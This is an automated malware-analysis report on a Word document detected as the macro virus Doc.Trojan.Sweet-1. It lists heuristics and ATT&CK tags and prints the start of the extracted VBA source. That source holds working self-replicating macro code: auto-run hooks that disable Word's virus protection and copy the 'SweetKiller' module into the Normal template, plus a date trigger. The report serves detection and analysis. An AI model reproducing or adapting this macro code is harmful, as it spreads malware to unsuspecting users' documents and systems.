MALICIOUS
340
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close functions, which are indicative of malicious intent. The critical heuristic firing for Shell() call in VBA, combined with the ClamAV detection of 'Doc.Trojan.Sweet-1', strongly suggests that the macros are designed to execute arbitrary commands. The VBA script itself contains numerous API declarations and drawing functions, but its ultimate purpose appears to be the execution of a secondary payload, likely facilitated by the Shell() call.
Heuristics 7
-
ClamAV: Doc.Trojan.Sweet-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Sweet-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17660 bytes |
SHA-256: f1bb32e41c422bd14dc62e056876de6423d492913b352375c954d07d0e3bf5c0 |
|||
|
Detection
ClamAV:
Doc.Trojan.Sweet-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SweetKiller"
Dim MainWindow As Long
Dim MainWindowDC As Long
Dim Pen As Long
Dim Brush As Long
Dim WindowsDir As String * 50
Dim ExitCommand As String
Type LOGFONT
lfHeight As Long
lfWidth As Long
lfEscapement As Long
lfOrientation As Long
lfWeight As Long
lfItalic As Byte
lfUnderline As Byte
lfStrikeOut As Byte
lfCharSet As Byte
lfOutPrecision As Byte
lfClipPrecision As Byte
lfQuality As Byte
lfPitchAndFamily As Byte
lfFaceName(50) As Byte
End Type
Dim MyFont As LOGFONT
Declare Function CreateFontIndirect Lib "gdi32" Alias "CreateFontIndirectA" (lpLogFont As LOGFONT) As Long
Declare Function SetTextColor Lib "gdi32" (ByVal hdc As Long, ByVal crColor As Long) As Long
Declare Function SetBkColor Lib "gdi32" (ByVal hdc As Long, ByVal crColor As Long) As Long
Declare Function GetActiveWindow Lib "user32" () As Long
Declare Function GetWindowDC Lib "user32" (ByVal hwnd As Long) As Long
Declare Function Rectangle Lib "gdi32" (ByVal hdc As Long, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Declare Function TextOut Lib "gdi32" Alias "TextOutA" (ByVal hdc As Long, ByVal x As Long, ByVal y As Long, ByVal lpString As String, ByVal nCount As Long) As Long
Declare Function CreatePen Lib "gdi32" (ByVal nPenStyle As Long, ByVal nWidth As Long, ByVal crColor As Long) As Long
Declare Function CreateSolidBrush Lib "gdi32" (ByVal crColor As Long) As Long
Declare Function SelectObject Lib "gdi32" (ByVal hdc As Long, ByVal hObject As Long) As Long
Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Function TimeReached() As Boolean
If Month(Now) = 12 And Day(Now) = 8 Then
TimeReached = True
Else
TimeReached = False
End If
End Function
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Create By SweetKiller "
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.SweetKiller.AutoOpen"
If Not InDocument() Then
GoInIt
Else
OutBreak
End If
End Sub
Sub AutoClose()
Attribute AutoClose.VB_Description = "Created by SweetKiller"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.SweetKiller.AutoClose"
If Not InDocument() Then
GoInIt
Else
OutBreak
End If
End Sub
Sub AutoNew()
If Not InDocument() Then
GoInIt
Else
OutBreak
End If
End Sub
Function InDocument() As Boolean
Dim item
InDocument = False
For Each item In ActiveDocument.VBProject.VBComponents
If item.Name = "SweetKiller" Then InDocument = True
Next
End Function
Function InTemplate() As Boolean
Dim item
InTemplate = False
For Each item In NormalTemplate.VBProject.VBComponents
If item.Name = "SweetKiller" Then InTemplate = True
Next
End Function
Sub GoInIt()
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="SweetKiller", Object:=wdOrganizerObjectProjectItems
End Sub
Sub OutBreak()
Options.VirusProtection = False
Options.Sa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.